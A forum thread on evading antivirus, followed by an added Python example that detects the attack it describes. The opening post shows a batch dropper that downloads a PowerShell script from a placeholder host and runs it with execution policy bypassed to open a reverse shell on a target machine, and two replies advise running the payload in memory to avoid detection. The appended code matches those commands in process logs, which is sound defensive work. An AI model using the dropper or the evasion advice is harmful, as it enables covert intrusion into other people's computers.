Evading antivirus – Digitalmunition





This topic contains 1 reply, has 2 voices, and was last updated by ShiroiOk 1 month, 1 week ago.

  • #336901

    anonymous
    Participant

    Hey guys!!

    I have a .ps1 script which, when executed on the target computer, gives me the reverse connection. The problem is that you can't run a ps1 file by directly clicking on it. So, I made a batch script which will execute the ps1 file; the code is pretty simple, you can look at it.

    There is an @ in front of echo but I'm not able to put it (Reddit's problem).

    echo off

    cd ..

    curl [http://www.xx.com/file.ps1](http://www.xx.com/file.ps1) -o %cd%\Appdata\local\file.ps1

    powershell -ep bypass %cd%\Appdata\local\hehe.ps1

    So, when I run this batch script it gives me a reverse connection without any problem, but when I convert this bat file to an exe it gets detected by Windows Defender.

    So, can you guys give me any tips on how to fix this? How can I get a reverse connection without getting detected?

  • #336902

    ShiroiOk

    Run in memory, nothing dropped to disk.

  • #336903

    straingebrue

    Don’t drop to disk
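
For defenders, the two commands in the batch script from the opening post leave a recognisable process-creation trail: a download tool writing a .ps1 under AppData, then PowerShell started with the execution policy overridden on a script in the same directory. The following Python is an added example, not part of the original thread, that correlates those two events; the log records, host names, user name and tuple layout are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records: (time, host, parent process, command line).
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", "WS01", "cmd.exe",
     r"curl http://www.xx.com/file.ps1 -o C:\Users\bob\Appdata\local\file.ps1"),
    ("2024-01-01T10:00:03", "WS01", "cmd.exe",
     r"powershell -ep bypass C:\Users\bob\Appdata\local\hehe.ps1"),
    ("2024-01-01T11:00:00", "WS02", "explorer.exe",
     r"powershell -File C:\Tools\inventory.ps1"),
    ("2024-01-01T12:00:00", "WS03", "cmd.exe",
     r"curl https://example.org/setup.zip -o C:\Temp\setup.zip"),
]

# curl writing a .ps1 somewhere under AppData.
DOWNLOAD = re.compile(
    r"\bcurl(\.exe)?\b.*\s-o\s+(?P<path>\S*\\appdata\\\S+\.ps1)", re.I)
# PowerShell with -ep / -ex* (ExecutionPolicy) set to bypass, running a .ps1 under AppData.
BYPASS = re.compile(
    r"\bpowershell(\.exe)?\b.*\s-(ep|ex\w*)\s+bypass\b"
    r".*?(?P<path>\S*\\appdata\\\S+\.ps1)", re.I)

def directory(path):
    """Lower-cased parent directory of a Windows path."""
    return path.rsplit("\\", 1)[0].lower()

def detect(events, window=timedelta(minutes=5)):
    """Alert on policy-bypass runs; 'high' if a .ps1 was just downloaded there."""
    downloads, alerts = [], []
    for ts, host, parent, cmd in sorted(events):
        when = datetime.fromisoformat(ts)
        d = DOWNLOAD.search(cmd)
        if d:
            downloads.append((when, host, directory(d["path"])))
            continue
        b = BYPASS.search(cmd)
        if b:
            # The script in the post saves file.ps1 but runs hehe.ps1, so
            # correlate on host and directory rather than on the file name.
            staged = any(h == host and dr == directory(b["path"])
                         and timedelta(0) <= when - t <= window
                         for t, h, dr in downloads)
            alerts.append({"host": host, "time": ts, "command": cmd,
                           "severity": "high" if staged else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```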
